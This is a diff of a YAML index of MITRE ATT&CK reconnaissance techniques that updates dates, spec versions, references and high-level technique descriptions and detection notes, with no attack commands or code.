+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+      - source_name: ExploitDB GoogleHacking
+        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+          October 23, 2020.
+        url: https://www.exploit-db.com/google-hacking-database
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.002:
     technique:
@@ -92514,7 +93203,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:36:58.964Z'
       name: Business Relationships
       description: |-
         Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -92530,8 +93219,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.003:
     technique:
@@ -92592,29 +93279,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1589.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
-      type: attack-pattern
-      created: '2020-10-02T14:57:15.906Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1589.003
-        url: https://attack.mitre.org/techniques/T1589/003
-      - source_name: OPM Leak
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
-        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:09:45.795Z'
       name: Employee Names
       description: |-
         Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -92623,15 +93291,34 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+      created: '2020-10-02T14:57:15.906Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1589/003
+        external_id: T1589.003
+      - source_name: OPM Leak
+        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.004:
     technique:
@@ -92657,7 +93344,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:35:09.668Z'
       name: Client Configurations
       description: |-
         Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -92675,47 +93362,10 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Philip Winther
-      - Sebastian Salla, McAfee
-      - Robert Simmons, @MalwareUtkonos
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
-      type: attack-pattern
-      created: '2020-10-02T17:08:57.386Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1598.002
-        url: https://attack.mitre.org/techniques/T1598/002
-      - source_name: Sophos Attachment
-        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
-        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
-          links – when phishers bring along their own web pages. Retrieved October
-          20, 2020.'
-      - source_name: GitHub Phishery
-        url: https://github.com/ryhanson/phishery
-        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
-          23, 2020.
-      - source_name: Microsoft Anti Spoofing
-        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
-        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
-          Retrieved October 19, 2020.
-      - source_name: ACSC Email Spoofing
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
-        description: Australian Cyber Security Centre. (2012, December). Mitigating
-          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-05-31T04:18:44.568Z'
       name: Spearphishing Attachment
       description: |-
         Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -92724,19 +93374,55 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Philip Winther
+      - Sebastian Salla, McAfee
+      - Robert Simmons, @MalwareUtkonos
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
         accounts receiving messages from a single unusual/unknown sender. Filtering
         based on DKIM+SPF or header analysis can help detect when the email sender
         is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+      created: '2020-10-02T17:08:57.386Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1598/002
+        external_id: T1598.002
+      - source_name: ACSC Email Spoofing
+        description: Australian Cyber Security Centre. (2012, December). Mitigating
+          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: Sophos Attachment
+        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+          links – when phishers bring along their own web pages. Retrieved October
+          20, 2020.'
+        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+      - source_name: Microsoft Anti Spoofing
+        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+          Retrieved October 19, 2020.
+        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+      - source_name: GitHub Phishery
+        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+          23, 2020.
+        url: https://github.com/ryhanson/phishery
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.004:
     technique:
@@ -92759,7 +93445,7 @@ reconnaissance:
         description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
           Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
           You Can Do About It. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:47:55.905Z'
       name: CDNs
       description: |-
         Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -92775,8 +93461,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591:
     technique:
@@ -92802,7 +93486,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.343Z'
       name: Gather Victim Org Information
       description: |-
         Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -92818,8 +93502,6 @@ reconnaissance:
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590:
     technique:
@@ -92847,7 +93529,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:23.229Z'
       name: Gather Victim Network Information
       description: |-
         Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -92863,12 +93545,10 @@ reconnaissance:
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593:
     technique:
-      modified: '2022-10-18T22:48:33.286Z'
+      modified: '2024-09-12T19:19:47.759Z'
       name: Search Open Websites/Domains
       description: |-
         Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -92877,16 +93557,16 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -92899,8 +93579,8 @@ reconnaissance:
         external_id: T1593
       - source_name: SecurityTrails Google Hacking
         description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-        url: https://securitytrails.com/blog/google-hacking-techniques
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
       - source_name: Cyware Social Media
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -92911,52 +93591,50 @@ reconnaissance:
         url: https://www.exploit-db.com/google-hacking-database
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1597:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
-      type: attack-pattern
-      created: '2020-10-02T17:01:42.558Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1597
-        url: https://attack.mitre.org/techniques/T1597
-      - source_name: D3Secutrity CTI Feeds
-        url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
-        description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
-          Intelligence Feeds. Retrieved October 20, 2020.
-      - source_name: ZDNET Selling Data
-        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
-        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
-          73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-04T13:12:14.469Z'
       name: Search Closed Sources
       description: |-
-        Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+        Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
 
         Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Barbara Louis-Sidney (OWN-CERT)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
+      type: attack-pattern
+      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+      created: '2020-10-02T17:01:42.558Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1597
+        external_id: T1597
+      - source_name: ZDNET Selling Data
+        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+          73 million user records on the dark web. Retrieved October 20, 2020.
+        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1592.003:
     technique:
@@ -92978,7 +93656,7 @@ reconnaissance:
         url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
         description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
           source code and proprietary data dumped online. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:22:46.759Z'
       name: Firmware
       description: |-
         Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -92994,8 +93672,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.002:
     technique:
@@ -93021,7 +93697,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:33:19.596Z'
       name: Software
       description: |-
         Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -93039,8 +93715,6 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.001:
     technique:
@@ -93062,7 +93736,7 @@ reconnaissance:
         url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:52:40.958Z'
       name: Social Media
       description: |-
         Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -93078,12 +93752,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.001:
     technique:
-      modified: '2023-04-14T23:29:10.396Z'
+      modified: '2024-10-10T13:45:01.069Z'
       name: Credentials
       description: "Adversaries may gather credentials that can be used during targeting.
         Account credentials gathered by adversaries may be those directly associated
@@ -93093,17 +93765,20 @@ reconnaissance:
         elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
         Adversaries may also compromise sites then add malicious content designed
         to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
-        Credential information may also be exposed to adversaries via leaks to online
-        or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
-        breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
-        Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
-        GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
-        may also purchase credentials from dark web or other black-markets. Finally,
-        where multi-factor authentication (MFA) based on out-of-band communications
-        is in use, adversaries may compromise a service provider to gain access to
-        MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
-        this information may reveal opportunities for other forms of reconnaissance
-        (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+        (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+        Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+        GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+        based on out-of-band communications is in use, adversaries may compromise
+        a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+        Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+        adversaries via leaks to online or other accessible data sets (ex: [Search
+        Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+        repositories, etc.). Adversaries may purchase credentials from dark web markets,
+        such as Russian Market and 2easy, or through access to Telegram channels that
+        distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+        2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+        Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+        for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
         or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
         establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
         and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
@@ -93115,6 +93790,7 @@ reconnaissance:
       - Vinayak Wadhwa, Lucideus
       - Lee Christensen, SpecterOps
       - Toby Kohlenberg
+      - Massimo Giaimo, Würth Group Cyber Defence Center
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -93125,7 +93801,7 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
       created: '2020-10-02T14:55:43.815Z'
@@ -93135,6 +93811,10 @@ reconnaissance:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1589/001
         external_id: T1589.001
+      - source_name: Bleeping Computer 2easy 2021
+        description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+          web marketplace for stolen data. Retrieved October 7, 2024.
+        url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
       - source_name: ATT ScanBox
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -93147,6 +93827,10 @@ reconnaissance:
         description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
           19, 2020.
         url: https://github.com/dxa4481/truffleHog
+      - source_name: Bleeping Computer Stealer Logs 2023
+        description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+          Stealer Logs in Context. Retrieved October 10, 2024.'
+        url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
       - source_name: Register Uber
         description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
           into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -93169,6 +93853,10 @@ reconnaissance:
           Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
           October 19, 2020.
         url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+      - source_name: SecureWorks Infostealers 2023
+        description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+          The Growing Threat from Infostealers. Retrieved October 10, 2024.
+        url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
       - source_name: Register Deloitte
         description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
           Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -93176,9 +93864,8 @@ reconnaissance:
         url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.003:
     technique:
@@ -93237,7 +93924,7 @@ reconnaissance:
         adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
         to access valuable information that can be exfiltrated or used to escalate
         privileges and move laterally. "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Wordlist Scanning
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -93257,7 +93944,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1591.004:
     technique:
@@ -93279,7 +93965,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:39:08.904Z'
       name: Identify Roles
       description: |-
         Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -93295,12 +93981,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598:
     technique:
-      modified: '2023-09-08T20:28:49.600Z'
+      modified: '2024-05-31T04:18:44.570Z'
       name: Phishing for Information
       description: "Adversaries may send phishing messages to elicit sensitive information
         that can be used during targeting. Phishing for information is an attempt
@@ -93369,7 +94053,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Avertium callback phishing
         description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
           PHISHING. Retrieved February 2, 2023.
@@ -93417,31 +94101,12 @@ reconnaissance:
         url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.001:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
-      type: attack-pattern
-      created: '2020-10-02T16:54:23.193Z'
